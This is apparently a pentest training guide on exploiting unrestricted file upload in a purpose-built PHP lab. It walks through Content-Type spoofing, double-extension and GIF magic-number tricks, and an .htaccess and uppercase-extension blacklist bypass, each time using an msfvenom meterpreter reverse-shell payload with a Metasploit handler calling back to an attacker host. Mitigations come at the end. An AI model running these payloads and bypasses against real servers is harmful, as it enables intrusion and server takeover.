Comprehensive Guide on Unrestricted File Upload

1|Page
 Comprehensive Guide on Unrestricted File Upload

Contents
Introduc�on ............................................................................................................................................ 3
Introduc�on to Unrestricted File Upload ................................................................................................ 3
Impact of Unrestricted File Upload ......................................................................................................... 3
File Upload Exploita�on .......................................................................................................................... 4
Basic File upload.................................................................................................................................. 4
Content-Type Restric�on..................................................................................................................... 6
What this content-type is? .............................................................................................................. 7
Double Extension File Upload ............................................................................................................. 9
Image Size Valida�on Bypass ............................................................................................................ 12
Blacklisted Extension File Upload ..................................................................................................... 14
How to Mi�gate? .................................................................................................................................. 18

2|Page
 Comprehensive Guide on Unrestricted File Upload

Introduction
A dynamic-web applica�on, somewhere or the other allow its users to upload a file, whether its an
image, a resume, a song, or anything specific. But what, if the application does not validate these
uploaded files and pass them to the server directly? Today, in this ar�cle, we’ll learn how such
invalida�ons to the user-input and server mismanagement, opens up the gates for the atackers to
host malicious content, over from the Unrestricted File Upload functionality in order to drop down
the web-applica�ons.

Introduction to Unrestricted File Upload

“Upload Here” or “Drag Your File To Upload” you might have seen these two phrases almost
everywhere, whether you are se�ng up your profile picture or you are simply applying for a job.

Developers scripts up File Upload HTML forms, which thus allows its users to upload files over onto
the web-server. However, this ease might bring up the danger, if he does not validate what files are
being uploaded.

Atackers exploit file upload vulnerabili�es, which are major problems within web-based
applica�ons. In many web servers, this vulnerability relies en�rely on inten�on, enabling an atacker
to upload a file containing malicious code that can then execute on the server.

Impact of Unrestricted File Upload

The consequences of this file upload vulnerability vary with every different web-applica�on, as it
depends on how the uploaded file is processed by the application or where it is stored.

Therefore, from this vulnerability, the atacker is thus able to:

• Take over the vic�m’s complete system with server-side atacks.

• Injects files with malicious paths which can thus overwrite exis�ng cri�cal files as he can
include “.htaccess” file to execute specific scripts.
• Reveal internal & sensi�ve informa�on about the webserver.

3|Page
 Comprehensive Guide on Unrestricted File Upload

• Overload the file system or the database.

• Inject phishing pages in order to simply deface the web-applica�on.

However, this file upload vulnerability has thus been reported with a CVSS Score of “7.6” with High
Severity under:

• CWE-434: Unrestricted Upload of File with Dangerous Type

So, I guess, you are now aware of the concept of file upload and why it occurs and even the
vulnerable consequences that the developer might face if the valida�ons are not implemented
properly. Thus, let’s try to dig deeper and learn how to exploit this File Upload vulnerability in all the
major ways we can.

For this section, we have developed a basic web-application with some PHP scripts which is thus
suffering from File Upload vulnerability.

Let’s Start!!

File Upload Exploitation

Basic File upload
There are �mes when the developers are not aware of the consequences of the File Upload
vulnerability and thus, they write up the basic PHP scripts with ease to complete up their tasks. But
this leniency opens up the gates to major sec�ons.

Let’s check out the script which accepts the uploaded files over from the basic File upload HTML
form on the webpage.

From the above code snippet, you can see that the developer hadn’t implemented any input
valida�on condi�on i.e. the server won’t check for the file extension or the content–type or
anything specific arguments and simply accepts whatever we upload.

4|Page
 Comprehensive Guide on Unrestricted File Upload

So let’s try to exploit this above web-applica�on, by crea�ng up a php backdoor using up our best
msfvenom one-liner as

msfvenom -p php/meterpreter/reverse_tcp lhost=[Link] lport=4444 -f raw

Copy and paste the highlighted code in your text editor and save as with PHP extension, here I did it
as “[Link]” on the desktop.

Now, back into the applica�on, click on Browse tag and opt [Link] over from the desktop.

So, let’s hit the upload buton which will thus upload our file on the web-server.

5|Page
 Comprehensive Guide on Unrestricted File Upload

From the above image, you can see that our file has been successfully uploaded. Thus we can check
the same by clicking over at the “here” text.

But wait �, before hi�ng the “here” text let’s load up our Metasploit framework and start the
mul� handler with

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost [Link]
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Now, as we hit the here text, we’ll get our meterpreter session and we have got the vic�m’s server.

Content-Type Restriction
Un�l now, we were only focusing on the fact that if the developer does not validate the things up,
then only the web-application is vulnerable. But what, if he implements the validations whether they
are basic or the major ones, will it still suffer from the File Upload vulnerability?

Let’s unlock this ques�on too.

6|Page
 Comprehensive Guide on Unrestricted File Upload

Here, back into our vulnerable web-applica�on, let’s try to upload our [Link] file again.

Oops!! This �me we faced up a Warning as it only accepts “PNG” files.

But why did this all happen? let’s get one step back and upload [Link] again, this �me turn
your burpsuite “ON” and capture the ongoing HTTP Request.

From the below image, into my burpsuite monitor, you can see that the content-type is here as
“applica�on/x-php”.

What this content-type is?

“Content-Type” entity in the header indicates the internal media type of the message content.

Some�mes web applica�ons use this parameter in order to recognize a file as a valid one. For
instance, they only accept the files with the “Content-Type” of “text/plain”.

7|Page
 Comprehensive Guide on Unrestricted File Upload

So it might be possible that the developer uses this thing to validate his applica�on.

Let’s try to bypass this protec�on by changing this content-type parameter with “image/png” in the
request header.

Hit the Forward buton and check its response !!

From the above image, you can see that we’ve successfully bypassed this security. Again repeat the
same process to run the mul� handler at the background before clicking the “here” text.

Great!! We ‘re back into the vic�m’s server.

Let’s check out its backend code in order to be more precise with why this all happened.

As guessed earlier, the developer might have used the content-type parameter to be a part of his
valida�on process. Thus here, he validates the uploading to be not acceptable when the $igcontent
value is not equal to “image/png”.

8|Page
 Comprehensive Guide on Unrestricted File Upload

Double Extension File Upload

While going into the further sec�on, when tried again by manipula�ng the content-type in the
Request header as with of “image/png”, we got failed this �me.

From the below image, you can see that the applica�on halt us back on the screen with an error to
upload a “PNG” file.

So, this might all happened because the applica�on would be checking the file extension or it is
only allowing files with “.png” extension to be uploaded over on the webserver and restricts other
files as the error speaks out !!

Let’s check out the developer’s code here as:

9|Page
 Comprehensive Guide on Unrestricted File Upload

Here, he sets up three new variables:

1. “$igallowed” which contains up an array for the extension “png” e. the webserver will
accept only that file which has .png at the end.
2. Now over in the next variable $igsplit he used explode() func�on with a reference to “.”, thus
the PHP interpreter will break up the complete filename as it encounters with over a dot “.”
3. In the third variable over in the $igExtension, he is using the end() func�on for the value of
$igsplit, which will thus contain up the end value of the filename.

For example:

Say we upload a file as “[Link]”, now first the $igsplit explodes up the file as it encounters
with a dot i.e. the file is now in three parts as [Reverse] [php] [png]. Thus now $igExtension will take
the end value of the filename i.e. [png].

4. Now, he even set up an if condi�on that checks the content-type value, compares it with
“image/png,” and verifies png in the $igExtension and the $igallowed. If he mismanages any
of the three condi�ons, it will raise an error; otherwise, it will pass.

Many techniques may help us to bypass this restric�on, but the most common and most preferred
way is implemen�ng “Double Extension” which thus hides up the real nature of a file by inser�ng
mul�ple extensions with a filename which creates confusion for security parameters.

For example, [Link] looks like a png image, which is data, not an application, but when
someone uploads the file with the double extension, it executes a php file, which is an application.

Let’s check out how!!

Here, I’ve renamed the previous file i.e. [Link] with “[Link]”.

From the below image, you can see that, when I clicked over at the “Upload” buton, I was presented
with a success window as

10 | P a g e
 Comprehensive Guide on Unrestricted File Upload

Great!! We’ve again bypassed this file extension security. Turn you Metasploit Framework back as
we did earlier and then hit the here text in order to capture up the meterpreter session.

Wonder why this all happened?

This occurs due to one of the major reason - Server Misconfiguration

The web-server might be misconfigured with the following insecure configura�on, which thus
enables up the double-extension and makes the web-applica�on vulnerable to double extension
atacks.

Note:

In order to make a double extension atack possible,“$” should be removed from the end of the
lines from the secured configura�on using

11 | P a g e
 Comprehensive Guide on Unrestricted File Upload

nano /etc/apache2/mods-available/[Link]

Image Size Validation Bypass

You might have seen applica�ons that restrict the file size, i.e., they do not allow users to upload a
file over a specific size. You can simply bypass this valida�on by uploading the smallest sized payload.

So, in our case, we weren’t able to upload [Link] as it was about of size more than 3Kb, which
thus didn’t sa�sfy the developer’s condi�on. Let’s check out the backend code over for it

Here, he used a new variable as $igdetails which is further calling up a php func�on i.e.
ge�magesize(). Therefore this predefined func�on is basically used to detect image files, which
ini�ally reads up the file and return the size of the image if the genuine image is uploaded else in
case an invalid file is there, then ge�magesize() fails. Further, in the sec�on, he even used another
variable as $igallowed which will thus only accepts the “gif” images.

So let’s try to call, one of the smallest payloads that is [Link] from the webshells
directory and paste it over on our Desktop.

cp /usr/share/webshells/php/[Link] /root/Desktop/
Now, its �me to set double extension over it, this �me we’ll be making it into a gif.

12 | P a g e
 Comprehensive Guide on Unrestricted File Upload

mv [Link] [Link]

Wait!! Before uploading this file, we need to set one more thing i.e. we need to add a Magic Number
for GIF images, such that if the server doesn’t check up the extension and instead checked the header
of the file, we won’t get caught. So in the case of “gif”, the magic number is “GIF89” or “GIF89a”, we
can use either of the two.

Time to upload!!

From the below image, you can see that we have successfully uploaded our file over onto the web-
server.

13 | P a g e
 Comprehensive Guide on Unrestricted File Upload

Hit the “here” text and check what we could grab over with it.

Great!! We have successfully bypassed this security too. Now, let’s try to grab some sensi�ve
content.

Blacklisted Extension File Upload

So, up�ll now we succeeded just because the developer had validated everything, but he didn’t
validate the php file, say with a not allowed condi�on or with any specific argument.

But here, this �me we encountered the same, he blacklisted everything, saying “php or Php
extensions,” he did whatever he could.

14 | P a g e
 Comprehensive Guide on Unrestricted File Upload

Whenever someone implements a blacklist for anything, it thus opens up the gates to other things
too. For example, if the developer blacklists .php, we could upload .PHP or .Php5 or anything specific.

Similar here, when we tried to bypass the file upload sec�on with every possible method. Either its
content type or double extension we got failed every �me and we got the reply as

Thus further, I tried to do that same by renaming the file from “[Link]” to “[Link]”

And as I hit the Upload buton, I got success!!

15 | P a g e
 Comprehensive Guide on Unrestricted File Upload

But wait, let’s check whether the file works or not, as I clicked on the “here” text, and the system
redirected me to the new page, but my file didn’t execute.

So why did this all happen? We’ve bypassed the security, it should work.

This happened because the target’s web-server was not configured to execute files with .PHP
extensions. i.e. we’ve bypassed the web-applica�ons security but the server was not able to execute
files other than .php extension.

So, in order to execute files with our desired extension, we need to upload an “htaccess” file i.e. a
file with

AddType application/x-httpd-php PHP

Save the above content in a file and name it with “.htaccess”.

But, before uploading our file over onto the server, the server should accept and allow .htaccess files
into the directory. Which thus can be turned “On” by se�ng up Allow Override to All from None.

Note:

Many web-applications sets AllowOverride to “All” for some of their specific purposes.

Let’s change it over in our webserver at

cd /etc/apache2/[Link]

16 | P a g e
 Comprehensive Guide on Unrestricted File Upload

Change it to all in the /var/www/ directory

Now restart the apache server with –

sudo service apache2 restart

Back into our web-applica�on. Let’s try to upload our “.htaccess” file.

Great!! And with successful uploading. Let’s now try to upload our payload file over it there again.

Hit the upload buton, but this �me before clicking over at the “here” text, let’s set up our
Metasploit framework again as we did earlier.

17 | P a g e
 Comprehensive Guide on Unrestricted File Upload

Cool!! From the image below, you can see that we’ve successfully bypassed this blacklisted valida�on
too and we are back with the new meterpreter session.

How to Mitigate?
• Rather than a blacklist, the developer should implement a set of acceptable files i.e. a
whitelist over in his scripts.
• The developer should allow specific file extensions.
• Only allow authorized and authen�cated users can use the feature to upload files.
• Never display up the path of the uploaded file. If the review of the file is required then
ini�ally the file should be stored into the temp. Directory with the least privileges.
• Patch the server properly, not even the web applica�on. i.e. do not allow double extensions
and set the AllowOverride to “None,” if not required.

To learn more about Website Hacking. Follow this Link.

18 | P a g e
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

[Link]